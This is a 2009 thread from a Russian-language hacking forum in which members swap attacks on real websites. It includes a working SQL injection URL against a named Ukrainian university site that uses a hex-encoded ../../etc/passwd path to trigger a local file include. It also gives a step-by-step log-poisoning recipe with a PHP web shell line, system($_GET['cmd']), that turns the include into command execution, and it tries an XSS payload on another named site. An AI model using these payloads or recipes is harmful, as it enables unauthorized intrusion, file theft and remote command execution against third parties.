 |
|
21.10.2009, 16:56
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от Strilo4ka
а по поводу include что то не понятно мне пока...
Сообщение от AFoST
о ептыть тут еще инклуд есть
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database (),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737 37764,3,4,5--+-&lan=ukr
в php-файле, который исполняется есть строчки примерно такие:
PHP код:
mysql_query("select pole1,pole2 from table1 where id_doc=".$_GET);
далее
$pole2 = присваивается значение 2 поля.
после этого идёт локаьный инклуд файла
Мы запросом
PHP код:
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764,3,4,5--+-&lan=ukr
делаем так, чтобы основной запрос вернул ложь, а UNION SELECT запрос вернул данные которые нам нужны.
В поле, значение которого потом инклудится, вносим HEX значение строки, так как с ковычками не получилось.
PHP код:
0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764
это равно
../../../../../etc/passwd
соответственно, подставляя во 2 поле в sql-injection путь до искомого файла, он инклудится.
Что непонятно - спрашивай.
__________________
Появляюсь редко. Важные дела в реале.
Последний раз редактировалось AFoST; 21.10.2009 в 16:58..
|
|
|
21.10.2009, 19:13
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Strilo4ka
кстати а этот коментарий /* в запросе нельзя было использовать... Да выводит ошыбку, типа слеш служебный наверно. А че так??? да понятно что надо еще поросчихлять.
Хотя бы есть выбор:
--
{
%23
#
|
|
|
|
21.10.2009, 19:13
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от Strilo4ka
теперь догнал AFoST . только не 0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737377 64, а 2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764 . Пробела нет перед 64. Оно наверно неправильно вставилось когда пост писался. Только что пропустил через bin2hex("../../../../../etc/passwd");. Кстати и что на ети данные дают интересно, как их использовать. что любой файл на хостинге прочитать можно это понятно. но это не GLOBAL INJECTION, толку от нее... Просто интересно для загального развития AFoST: 1. форум античата в длинных строках вставляет пробелы.
2. А про local file include почитай на форуме есть. Скажу одно - это огромный плюс!
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
21.10.2009, 20:12
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами:
9679872
Репутация:
347
|
|
Сообщение от Strilo4ka
ребята что нам дает файл passwd. В принцыпе в гугде поискать не проблема,а так в 5-ти словах. Знаю что пароля там нет. Там выведено даные о пользователях и слубы или что ??? а пароль в файле shadow наскольку я знаю. Тоэсть не пароль а хешы паролей.
Ctacok , а что разве в mysql 5 версии { скобка это коментарий?
скобка не есть комментарий
файл passwd даст список юзеров системы, а иногда эта информация может помочь.
|
|
|
|
21.10.2009, 22:49
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от Strilo4ka
AFoST,чисто теоретический вопрос(думаю пост удален не будет): Возможно ли через лог файл поднять привилегии используя эту локальную иньекцию кода на сайте. Интересно все что после ? в URL будет записываться в лог. По умолчанию оно записываеться??? На денверер я обобщаю (апач) кажеться не.... А там допустим прописать <? system($_GET['cmd']); ?>, а потом подключить лог файл передав строку в HEX. И главный когда встретит инструкции PHP кода он их передаст интерпрератору таким образом получиться передавать переменную cmd через гет. А в значение прописывать команды DOS, допустим или linux. Я правц?
Да, это известный прием инклуда лог файла.
1. находим инклуд
2. находим логи /path/log/access_log
3. запрос с cmd на сайт http://site/? ...
4. инклудим через инклуд, найденный в п.1. access_log
http://site/include.php?include=/path/log/acces_log&cmd=ls+-lia
upd ты права таким способом не поднимаешь, ты просто выполняешь php.
ps Изъясняй мысли правильней!!! Я с 5го прочтения тебя понимаю!!!
__________________
Появляюсь редко. Важные дела в реале.
Последний раз редактировалось AFoST; 21.10.2009 в 22:53..
|
|
|
|
22.10.2009, 03:26
|
|
Познающий
Регистрация: 20.10.2009
Сообщений: 38
С нами:
8715864
Репутация:
5
|
|
Вот посмотрите пожалуйста, мне кажется это пассивная XSS?просто я в этом вообще не разбераюсь =))
http://la2.sz.ru/news.php?%22%3E%3Cscript%3Ealert()%3C/script%3Ereadmore=99
|
|
|
|
22.10.2009, 04:40
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
Сообщение от Totgeliebt
Вот посмотрите пожалуйста, мне кажется это пассивная XSS?просто я в этом вообще не разбераюсь =))
http://la2.sz.ru/news.php?%22%3E%3Cscript%3Ealert()%3C/script%3Ereadmore=99
нет
|
|
|
|
22.10.2009, 11:23
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
С нами:
8829763
Репутация:
131
|
|
Подкиньте статей по LFI. А то ничего найти не могу =(
|
|
|
|
22.10.2009, 11:41
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
Последний раз редактировалось Qwazar; 22.10.2009 в 11:49..
|
|
|
|
22.10.2009, 15:41
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
